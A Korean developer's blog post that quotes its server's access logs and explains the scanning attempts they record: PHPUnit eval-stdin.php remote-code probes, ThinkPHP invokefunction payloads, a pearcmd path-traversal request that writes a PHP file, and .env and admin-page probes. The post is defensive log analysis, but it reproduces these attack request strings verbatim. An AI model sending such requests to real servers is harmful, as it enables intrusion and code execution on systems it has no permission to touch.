오늘의 해킹정황 (1)

728x90

오늘의 해킹 정황

"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 943 "backend not found" "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 944 "backend not found" "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 945 "backend not found" "/vendor/phpunit/src/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 946 "backend not found" "/vendor/phpunit/Util/PHP/eval-stdin.php"
"GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 947 "backend not found" "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php"
"GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 948 "backend not found" "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 949 "backend not found" "/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 950 "backend not found" "/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 951 "backend not found" "/phpunit/src/Util/PHP/eval-stdin.php"
"GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 952 "backend not found" "/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 953 "backend not found" "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 954 "backend not found" "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 955 "backend not found" "/lib/phpunit/src/Util/PHP/eval-stdin.php"
"GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 956 "backend not found" "/lib/phpunit/Util/PHP/eval-stdin.php"
"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 957 "backend not found" "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 958 "backend not found" "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 959 "backend not found" "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 960 "backend not found" "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 961 "backend not found" "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 962 "backend not found" "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 963 "backend not found" "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 964 "backend not found" "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 965 "backend not found" "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 966 "backend not found" "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 967 "backend not found" "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 968 "backend not found" "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 969 "backend not found" "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 970 "backend not found" "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 971 "backend not found" "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 972 "backend not found" "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 973 "backend not found" "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 974 "backend not found" "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 975 "backend not found" "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 976 "backend not found" "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 977 "backend not found" "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 978 "backend not found" "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 979 "backend not found" "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 980 "backend not found" "/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello"
"GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 981 "backend not found" "/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello"
"GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php"
"GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 19 "-" "Custom-AsyncHttpClient" 983 "backend not found" "/index.php?lang=../../../../../../../../tmp/index1"
"GET /.env HTTP/1.1" 404 19 "-" "Mozilla/5.0 (X11; Linux x86_64)" 984 "backend not found" "/.env"
"GET / HTTP/1.1" 404 19 "-" "Hello World" 985 "backend not found" "/
"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 986 "backend not found" "/admin/login.asp"
"GET /admin/login.asp HTTP/1.1" 404 19 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 987 "backend not found" "/admin/login.asp"
"GET /favicon.ico HTTP/1.1" 404 19 "http://119.205.236.169/admin/login.asp" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 988 "backend not found" "/favicon.ico"

오늘도 어김없이 여러 국가에서 문을 열고 들어올려고 시도하는 로그를 기록했다. 어플리케이션 수준에서 데이터 소스를 남기는 일은 이제 선택이 아니라 필수라고 할 수 있다. 개발을 하면서 잘모르니 주먹구구식으로 이거 저거 대입하는 식의 개발로 시작하면 처음에는 빠를것같던 속도가 규모가 커지면 점점 더뎌지는 것을 확인 할 수 있다. 이렇듯 로그는 정말 중요하다.

로그 분석

1. PHPUnit Exploits

PHPUnit은 PHP로 작성된 단위 테스트 도구입니다. 해커들은 종종 PHPUnit이 설치된 서버에서 특정 파일을 통해 원격 코드 실행을 시도합니다. (5점대 이하의 php 버전에서 발생하는 취약점이며 vender 안에 패키지 파일과 잡다한 파일들이 들어있어 여기로 접긴해 데이터를 탈취하려는 시도이다.)

파일 탐색 시도: 다양한 경로에서 eval-stdin.php 파일을 요청함으로써 해당 파일이 존재하는지 확인하려고 합니다. 이 파일은 원격 코드 실행 취약점(CVE-2017-9841)과 관련이 있습니다.

  /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

2. ThinkPHP Exploits

ThinkPHP는 중국에서 인기 있는 PHP 웹 프레임워크입니다. 해커들은 종종 ThinkPHP의 취약점을 이용해 원격 코드 실행을 시도합니다.

경로 조작 및 원격 코드 실행 시도: 특정 URL 패턴을 통해 call_user_func_array 함수를 호출하여 원격 코드 실행을 시도합니다.

  /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
  /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello

3. Directory Traversal 및 Local File Inclusion (LFI)

디렉토리 트래버설 공격을 통해 서버의 민감한 파일에 접근하려고 시도합니다.

디렉토리 트래버설 시도: 서버의 다른 디렉토리로 접근하여 특정 파일을 실행하려고 시도합니다.

  /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
  /index.php?lang=../../../../../../../../tmp/index1

4. 환경 파일 접근 시도

.env 파일은 환경 설정 정보를 담고 있으며, 노출될 경우 심각한 보안 위협이 될 수 있습니다.

환경 파일 접근 시도: 서버의 .env 파일을 직접 요청하여 민감한 정보를 얻으려는 시도입니다.
```
  /.env
```

5. 기본 페이지 및 관리자 로그인 페이지 접근 시도

공격자는 종종 기본 페이지 및 관리자 페이지에 접근하여 인증을 우회하거나 기본 자격 증명을 시도합니다.

기본 페이지 접근 시도: 서버의 기본 페이지에 접근하려고 시도합니다.
/ HTTP/1.1" 404 19 "-" "Hello World
관리자 로그인 페이지 접근 시도: 관리자 로그인 페이지에 접근하려고 시도합니다.
/admin/login.asp
Favicon 접근 시도: 관리자 페이지의 favicon.ico 파일에 접근하여 관리자 페이지의 존재 여부를 확인하려고 시도합니다.
/favicon.ico

이와 같은 로그는 서버의 보안 취약점을 탐색하고 악용하려는 해킹 시도를 나타냅니다. 해당 로그를 통해 해킹 시도를 식별하고 적절한 보안 조치를 취하는 것이 중요합니다.

저작자표시

'🧑‍💻 Develop' 카테고리의 다른 글

Github 계정 전환 (0)	2024.08.19
Github Action Workflow Uses (0)	2024.08.12
indent : tab(탭, \t) or space(공백, \s) (0)	2024.05.08
[rsyslog] 다시 만난 rsyslogd: action 'action-2-builtin:omfile' resumed (module 'builtin:omfile') (0)	2024.04.17
[rsyslog] imklog: cannot open kernel log, ERROR (Syntax error, this crontab file will be ignored), Operation not permitted. (0)	2024.03.08

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

오늘의 해킹정황 (1)

오늘의 해킹 정황

로그 분석

1. PHPUnit Exploits

2. ThinkPHP Exploits

3. Directory Traversal 및 Local File Inclusion (LFI)

4. 환경 파일 접근 시도

5. 기본 페이지 및 관리자 로그인 페이지 접근 시도

'🧑‍💻 Develop' 카테고리의 다른 글

오늘의 해킹 정황

로그 분석

1. PHPUnit Exploits

2. ThinkPHP Exploits

3. Directory Traversal 및 Local File Inclusion (LFI)

4. 환경 파일 접근 시도

5. 기본 페이지 및 관리자 로그인 페이지 접근 시도

'🧑‍💻 Develop' 카테고리의 다른 글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

'🧑‍💻 Develop' 카테고리의 다른 글

'🧑‍💻 Develop' 카테고리의 다른 글

개인정보

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역